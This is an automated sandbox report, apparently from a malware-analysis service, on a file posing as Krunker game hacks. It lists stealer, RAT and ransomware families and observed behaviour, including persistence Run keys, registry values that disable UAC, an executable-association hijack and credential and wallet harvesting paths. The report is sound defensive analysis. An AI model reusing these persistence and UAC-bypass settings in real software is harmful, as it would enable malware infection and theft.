Analysis Overview
SHA256
892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba
Threat Level: Known bad
The file krunker.iohacks.cc was found to be: Known bad.
Malicious Activity Summary
Maze
DcRat
HawkEye
Detect ZGRat V1
Lumma Stealer
Process spawned unexpected child process
Detect Neshta payload
ZGRat
RedLine payload
Stealc
RisePro
UAC bypass
Wannacry
Neshta
Ramnit
Modifies WinLogon for persistence
Cerber
RedLine
Troldesh, Shade, Encoder.858
Deletes shadow copies
NirSoft WebBrowserPassView
DCRat payload
NirSoft MailPassView
Nirsoft
Blocklisted process makes network request
Contacts a large (1100) amount of remote hosts
Downloads MZ/PE file
Contacts a large (1143) amount of remote hosts
Disables RegEdit via registry modification
Office macro that triggers on suspicious action
Contacts a large (1132) amount of remote hosts
Drops file in Drivers directory
Disables Task Manager via registry modification
Modifies Windows Firewall
Unexpected DNS network traffic destination
Uses the VBS compiler for execution
Executes dropped EXE
Modifies file permissions
Reads data files stored by FTP clients
Checks computer location settings
Modifies system executable filetype association
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Drops startup file
.NET Reactor proctector
UPX packed file
Accesses Microsoft Outlook accounts
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Checks whether UAC is enabled
Accesses Microsoft Outlook profiles
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Drops file in System32 directory
Drops autorun.inf file
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Sets desktop wallpaper using registry
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Program crash
Office loads VBA resources, possible macro or embedded object present
Runs net.exe
Opens file in notepad (likely ransom note)
Enumerates system info in registry
Interacts with shadow copies
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Modifies system certificate store
outlook_office_path
Views/modifies file attributes
Uses Volume Shadow Copy service COM API
System policy modification
Kills process with taskkill
Creates scheduled task(s)
Delays execution with timeout.exe
Script User-Agent
Suspicious use of UnmapMainImage
Suspicious use of FindShellTrayWindow
outlook_win_path
Uses Task Scheduler COM API
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
Runs ping.exe
Modifies registry key
Suspicious behavior: LoadsDriver
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-01-09 22:08
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-09 22:08
Reported
2024-01-09 22:29
Platform
win7-20231215-en
Max time kernel
565s
Max time network
634s
Command Line
Signatures
DcRat
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." | C:\PROGRA~3\system.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." | C:\PROGRA~3\system.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
HawkEye
Neshta
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Ramnit
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
RisePro
Stealc
Troldesh, Shade, Encoder.858
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
Wannacry
ZGRat
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Deletes shadow copies
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Contacts a large (1132) amount of remote hosts
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe | C:\PROGRA~3\system.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD94B6.tmp | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD94CA.tmp | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe | C:\PROGRA~3\system.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Uses the VBS compiler for execution
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." | C:\PROGRA~3\system.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "\"C:\\ProgramData\\freebl3\\system.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\enuqrziy120 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\tasksche.exe\"" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\ Ransomware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\bot.exe" | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." | C:\PROGRA~3\system.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6 = "\"C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\6.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\Desktop\7.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File opened for modification | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File created | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File opened for modification | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\documents | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\desktop | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpA9B.bmp" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2320 set thread context of 1576 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe |
| PID 2624 set thread context of 3368 | N/A | C:\Users\Admin\Desktop\7.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
| PID 3536 set thread context of 3916 | N/A | C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe |
| PID 3156 set thread context of 3212 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\MSOSYNC.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\PPTICO.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ieinstal.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\WMPDMC.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\1033\ONELEV.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\CLVIEW.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\bitcoin | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\program files (x86)\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ielowutil.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\TextConv\WksConv\Wkconv.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\BCSSync.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\program files (x86)\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\XLICONS.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\wmpconfig.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\px9BD2.tmp | C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\ACCICONS.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\MSQRY32.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\wmplayer.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\DW\DW20.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\IECONT~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\VPREVIEW.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\WINWORD.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI4223~1\sidebar.exe | C:\Windows\svchost.com | N/A |
| File created | C:\Program Files (x86)\Microsoft\DesktopLayer.exe | C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBEU~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\wmprph.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\6.exe | C:\Users\Admin\Desktop\6.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\misc.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | \??\c:\program files\ | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\MSTORE.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\WORDICON.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~1\wabmig.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Oarpmany.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\READER~1.0\Reader\ACROBR~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~1\wab.exe | C:\Windows\svchost.com | N/A |
